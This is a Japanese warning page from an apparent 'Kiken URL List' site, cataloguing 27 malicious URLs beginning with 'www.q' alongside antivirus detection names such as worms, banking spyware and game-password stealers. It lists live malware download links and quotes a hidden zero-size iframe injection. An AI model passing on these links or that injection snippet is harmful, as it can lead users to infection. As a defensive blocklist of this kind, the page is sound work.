Kiken URL List
http:// www. q から始まるURL

このページは危険と思われるURLでhttp:// www. q から始まるURLを掲載しています。
他のサイトからこのページに来られた方は最初に Kiken URL List のトップページ をよく読んでください。


Kiken URL List の見方

通し番号.URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説
  ← このようになっています。

  1. http://www.q.q.39com.net/vipmm1/qq1.exe
    [2007/02/14]2007/02/04 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:WORM_SMALL.EXI として検出するよう対応、とのこと。
    実際に 2007/02/04 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:WORM_SMALL.EXI を検出することを確認。
    2007/02/04 から今日まではファイルは置き換えられていないと推測される。


  2. http://www.q.q.39com.net/vipmm2/qq2.exe
    [2007/02/14]2007/02/04 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:WORM_SMALL.EXJ として検出するよう対応、とのこと。
    実際に 2007/02/04 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:WORM_SMALL.EXJ を検出することを確認。
    2007/02/04 から今日まではファイルは置き換えられていないと推測される。


  3. http://www.q.q.39com.net/vipmm3/qq3.exe
    [2007/02/14]2007/02/04 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:WORM_SMALL.EXK として検出するよう対応、とのこと。
    実際に 2007/02/04 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:WORM_SMALL.EXK を検出することを確認。
    2007/02/04 から今日まではファイルは置き換えられていないと推測される。


  4. http://www.q.q.39com.net/vipmm4/qq4.exe
    [2007/02/14]2007/02/04 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:WORM_SMALL.EXL として検出するよう対応、とのこと。
    実際に 2007/02/04 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:WORM_SMALL.EXL を検出することを確認。
    2007/02/04 から今日まではファイルは置き換えられていないと推測される。


  5. http://www.qgqueen.mail333.com/ienovo.exe
    [2007/02/19]ウィルス名:TSPY_BANKER.FPK


  6. http://www.qiucong.com/
  7. http://www.qiucong.com/index.html
    [2006/08/24]真っ白なページ。バスター無反応だが、他社製アンチウィルスソフトではウィルス反応があると思われる。
    ソースを見るとコード変換されたスクリプトが書かれている。復号化してみると VBScript である。
    [2006/09/19]他の方の結果は以下の「」内。
    「オンラインRPG リネージュ のサイトに飛ばされますが、その前にインフレームで変なソースのページを読み込まれます。
    Kaspersky 反応なしですが、オンラインスキャンで
    AntiVir → VBS/Dldr.Small.AY
    Ewido → Downloader.Agent.m
    McAfee → Exploit-MS06-014
    を検出。脆弱性を狙ったVBSトラップなのかな?環境によってはPC有害の可能性ありなので踏まないほうがいいでしょう。」


  8. http://www.qiucong.com/game/wp.scr
    [2006/09/06]2006/08/26 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TSPY_LINEAGE.BGV として検出するよう対応、とのこと。
    2006/08/26 にDLしたファイルからウィルス名:TSPY_LINEAGE.BGV を検出することを確認。
    しかし、今日改めて当該URLからDLしてみようとするが、何度DLを試みても404であった。


  9. http://www.qiucong.com/mutou/wp.exe
    [2006/07/24]ウィルス名:TSPY_LINEAGE.AOB


  10. http://www.qiucong.com/xq.exe
    [2006/09/06]2006/08/26 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TSPY_LINEAGE.BGV として検出するよう対応、とのこと。
    2006/08/26 にDLしたファイルからウィルス名:TSPY_LINEAGE.BGV を検出することを確認。
    しかし、今日改めて当該URLからDLしてみると、バスター無反応。
    恐らく、新しいファイルに随時置き換えられるURLと推測される。
    [2006/09/13]2006/09/09 にトレンドマイクロ社にファイルを再提出。
    今日、その結果の連絡があり、ウィルス名:TSPY_LINEAGE.BPD として検出するよう対応、とのこと。
    2006/09/09 にDLしたファイルからウィルス名:TSPY_LINEAGE.BPD を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:TSPY_LINEAGE.BPD を検出することを確認。


  11. http://www.qolabs.com/pixelfusion/
    [2008/12/14]こんな感じ のサイト。バスター無反応だが、他社製ウィルス駆除ソフトでは反応があると思われる。
    このサイトは、'Microsoft Corporation'からの'Remote Data Services Data Control'アドオンを実行しようとしている。
    [2008/12/14]他の方の結果は以下の「」内。
    「ランダム?でリモートアクセス関係のアドオンを実行しようとするようです。オンラインスキャンで、
    Avast JS:Packed-Z
    GData JS:Packed-Z
    Sophos Mal/ObfJS-BI の反応あり。踏まないほうがいいでしょう。」


  12. http://www.qoogler.com/
    [2008/06/29] こんな感じ のサイト。googleのサイトを真似しているが、ウィルス名:TSC_GENCLEAN+TROJ_AGENT.AAFX を検出。
    ソースを見ると以下のファイルを実行しようとしている。
    //www.qoogler.com/GobbaEvo.exe


  13. http://www.qoogler.com/Cercaqui.exe
    [2008/06/29]ウィルス名:TSC_GENCLEAN+TROJ_AGENT.CXI


  14. http://www.qoogler.com/GobbaEvo.exe
    [2008/06/29]ウィルス名:TSC_GENCLEAN+TROJ_AGENT.AAFX


  15. http://www.qoogler.com/linkpal.exe
    [2008/06/29]ウィルス名:TSC_GENCLEAN+TROJ_LOWZONE.BT


  16. http://www.qoogler.com/mauth.exe
    [2008/06/29]ウィルス名:TSC_GENCLEAN+TROJ_AGENT.ZTH


  17. http://www.qoogler.com/Module.exe
    [2008/06/29]ウィルス名:TSC_GENCLEAN+Mal_Banker


  18. http://www.qoogler.com/Qoogler2008.exe
    [2008/06/29]ウィルス名:TSC_GENCLEAN+TROJ_STARTPA.BR


  19. http://www.quality-control.seks-anons.pl/
    [2006/10/18]海外サイトだが、ウィルス名:JS_EXCEPTION.GEN を検出。
    ソースを見ると、IFRAMEタグで複数のURLを呼び出しているが、その中の以下のURLがウィルスの発動元である。
    //67.15.114.122/my_stat.php


  20. http://www.quantos.info/toolbar/sheila-charvalho-flagra-transando.exe
  21. http://www.quantos.info/toolbar/viviane-e-o-namorado-fudendo.exe
    [2006/01/12]バスター無反応だが、Avast! で Win32:Adware-gen. を検出。


  22. http://www.quin.biz/pokemon-sex-xxx.htm
    [2004/10/24]//www.pillz.org/landing.phpに飛ぶが怪しい挙動。


  23. http://www.quintadavaranda.com/gjh/Paris-nude-video.avi.exe
    [2008/08/19]2重拡張子。ウィルス名:TSC_GENCLEAN+TROJ_FAKEALER.FO


  24. http://www.qwerks.com/download/5600/123pcspy.exe
    [2005/11/22]ウィルス名:SPYW_PCSPY.21


  25. http://www.qwerks.com/download/5635/NewSpy.exe
    [2005/11/23]ウィルス名:SPYW_REALSPY.230


  26. http://www.qwerks.com/download/5758/realspy.exe
    [2005/11/23]ウィルス名:SPYW_REALSPY.149


  27. http://www.qzfeyy.com/
    [2006/06/17]こんな感じ のサイトだが、ウィルス名:JS_MHTREDIR.HR を検出。
    ソースを見ると以下のスクリプトが2箇所に書いてある。これが元凶。
    <iframe src="http://www.liu775.com/q1/index.htm"width="0" height="0"></iframe>
    [2006/06/17]他の方の結果は以下の「」内。
    「Kaspersky 反応あり。Exploit.HTML.Mht 検出。」
    「トロイの木馬 VBS/Psyme (マカフィー)を検出。」